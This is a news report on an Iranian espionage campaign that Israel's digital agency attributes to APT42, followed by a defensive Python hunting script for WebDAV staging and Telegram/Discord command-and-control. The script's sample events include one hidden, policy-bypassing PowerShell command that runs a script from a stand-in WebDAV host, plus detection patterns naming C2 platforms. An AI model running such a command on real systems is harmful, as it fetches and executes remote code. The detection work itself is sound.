The silent attack… Israel speaks of “unprecedented” Iranian espionage
A new Iranian cyber campaign is reportedly targeting officials using deep social engineering, according to Israel.
This was revealed by Israel’s National Digital Agency, which spoke of a sophisticated and unprecedented Iranian cyber-espionage campaign codenamed “SpearSpecter,” attributed to a group linked to the intelligence services of the Revolutionary Guard, according to Yedioth Ahronoth.
Targets and attack methods
This group — also known as APT42 and CharmingCypress — now operates with new methods and tactics, moving away from broad and indiscriminate attacks toward precise espionage based on advanced social engineering.
In a briefing with cybersecurity researcher Shimi Cohen and Nir Bar Yosef, head of the agency’s cyber unit, officials revealed that the campaign systematically targets high-value individuals in Israel’s defense and government sectors, along with members of their families.
Bar Yosef stated: “This campaign represents a significant development. Cyberattacks have become more personalized and require greater resources. It is no longer just about stealing passwords but about gaining long-term, continuous access to specific targets.”
According to the agency, the attackers spend days or even weeks building what appear to be legitimate personal or professional relationships with their targets.
Common lures include invitations to “prestigious conferences” or requests to schedule “high-level meetings.”
As of the time of writing, Iran has neither confirmed nor denied the claims made by the Israeli digital agency.
WhatsApp… a tool for building trust and gaining access
Among the primary tools used is the WhatsApp application, which provides a familiar interface to establish trust.
In this context, the security expert explained that “the campaign begins with the collection of preliminary information, after which the attackers impersonate a real individual and usually contact the target via WhatsApp.”
Once trust is established, the attackers send a malicious link that triggers a multi-stage attack chain. For lower-value targets, pre-built fake meeting pages capture login credentials in real time as the victim types them.
For high-value targets, the goal is to implant an advanced backdoor that Google tracks as “TAMECAT.” It is built on PowerShell, so its activity runs through a legitimate, signed Windows component rather than a dropped executable, which makes it much harder to detect with traditional signature-based security tools.
Exploitation of Windows features and the WebDAV protocol
The attackers also abuse built-in Windows features and the WebDAV protocol (an HTTP extension that lets Windows mount a remote web server as if it were a network share) while staging the malicious payload.
To evade detection, they use a multichannel command-and-control structure built on legitimate platforms such as Telegram and Discord, so that the control traffic blends in with ordinary use of those services.
Bar Yosef explained: “The innovation here lies in concealing the data flow. They use legitimate services like Telegram and Discord as control servers, making data leakage extremely difficult to detect.”
He added: “In today’s threat landscape, the number-one rule is: verify, then verify again, and then verify once more.”
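The two technical threads above, a PowerShell-based implant staged over WebDAV and command-and-control tunnelled through Telegram and Discord, both leave traces in ordinary endpoint telemetry. The following hunting script is an added example written for this page; it is not code from the National Digital Agency, from Google, or from the article. It runs over a few constructed Sysmon-style events (the JSON field names `host`, `pid`, `image`, `cmd`, `dst_host` and the hostnames in them are invented for illustration; adapt them to your SIEM’s schema) and flags three things: a command line that references a WebDAV UNC path (`\\server@SSL\DavWWWRoot\...` or `\\server@80\...`), a PowerShell process connecting to a chat-platform API domain, and a single PowerShell process talking to more than one such platform, which is the “multichannel” pattern described in the briefing. The domain list is an assumption, not a list published by the agency.

```python
import json
import re
from collections import defaultdict

# Constructed sample telemetry in a simplified Sysmon-like JSON-lines shape.
# Field names, hosts, users and paths are hypothetical and exist only for this example.
SAMPLE_EVENTS = r"""
{"ts":"2025-11-17T09:01:02Z","host":"WS-17","event":"ProcessCreate","pid":4412,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\explorer.exe","cmd":"powershell.exe -nop -w hidden -ep bypass -f \\\\files.example-cdn.test@SSL\\DavWWWRoot\\invite\\agenda.ps1"}
{"ts":"2025-11-17T09:01:03Z","host":"WS-17","event":"NetworkConnect","pid":4412,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dst_host":"files.example-cdn.test","dst_port":443}
{"ts":"2025-11-17T09:01:09Z","host":"WS-17","event":"NetworkConnect","pid":4412,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dst_host":"api.telegram.org","dst_port":443}
{"ts":"2025-11-17T09:02:40Z","host":"WS-17","event":"NetworkConnect","pid":4412,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dst_host":"discord.com","dst_port":443}
{"ts":"2025-11-17T09:05:00Z","host":"WS-22","event":"ProcessCreate","pid":7001,"image":"C:\\Program Files\\Discord\\Discord.exe","parent":"C:\\Windows\\explorer.exe","cmd":"\"C:\\Program Files\\Discord\\Discord.exe\""}
{"ts":"2025-11-17T09:05:01Z","host":"WS-22","event":"NetworkConnect","pid":7001,"image":"C:\\Program Files\\Discord\\Discord.exe","dst_host":"discord.com","dst_port":443}
{"ts":"2025-11-17T09:06:00Z","host":"WS-22","event":"ProcessCreate","pid":7100,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\System32\\svchost.exe","cmd":"powershell.exe -File C:\\Scripts\\inventory.ps1"}
"""

# Assumed list of chat-platform API domains worth watching when the client is a
# script host rather than the platform's own desktop app. Extend for your environment.
C2_PLATFORM_DOMAINS = {
    "api.telegram.org": "Telegram Bot API",
    "discord.com": "Discord",
    "discordapp.com": "Discord",
}
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")

# Windows WebClient (WebDAV redirector) UNC forms: \\server@SSL\... or \\server@<port>\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(?:ssl|\d{1,5})\\", re.IGNORECASE)
DAVWWWROOT = re.compile(r"davwwwroot", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def is_script_host(image):
    """True when the process image is powershell.exe or pwsh.exe (path-insensitive)."""
    return image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS


def platform_for(host):
    """Map a destination hostname (or a subdomain of a watched domain) to a platform name."""
    host = host.lower()
    for domain, name in C2_PLATFORM_DOMAINS.items():
        if host == domain or host.endswith("." + domain):
            return name
    return None


def hunt(events):
    """Return a list of finding dicts for WebDAV staging and chat-platform C2 from script hosts."""
    findings = []
    platforms_by_proc = defaultdict(set)  # (host, pid) -> set of platform names contacted
    for ev in events:
        key = (ev["host"], ev["pid"])
        if ev["event"] == "ProcessCreate":
            cmd = ev.get("cmd", "")
            if WEBDAV_UNC.search(cmd) or DAVWWWROOT.search(cmd):
                findings.append({"rule": "webdav_unc_in_commandline", "host": ev["host"],
                                 "pid": ev["pid"], "cmd": cmd})
        elif ev["event"] == "NetworkConnect":
            platform = platform_for(ev["dst_host"])
            if platform and is_script_host(ev["image"]):
                platforms_by_proc[key].add(platform)
                findings.append({"rule": "script_host_to_chat_platform", "host": ev["host"],
                                 "pid": ev["pid"], "platform": platform, "dst": ev["dst_host"]})
    # One script-host process using two or more platforms is the multichannel C2 pattern.
    for (host, pid), platforms in platforms_by_proc.items():
        if len(platforms) >= 2:
            findings.append({"rule": "multichannel_c2", "host": host, "pid": pid,
                             "platforms": sorted(platforms)})
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(finding))
```

In the sample, only the WS-17 PowerShell process is flagged: the Discord desktop client on WS-22 talking to discord.com and the scheduled inventory script with no network activity both pass. Expect false positives from legitimate automation that posts to Telegram or Discord bots; tune by parent process, script path, and user before alerting on the single-platform rule, and treat the multichannel and WebDAV rules as the higher-confidence signals.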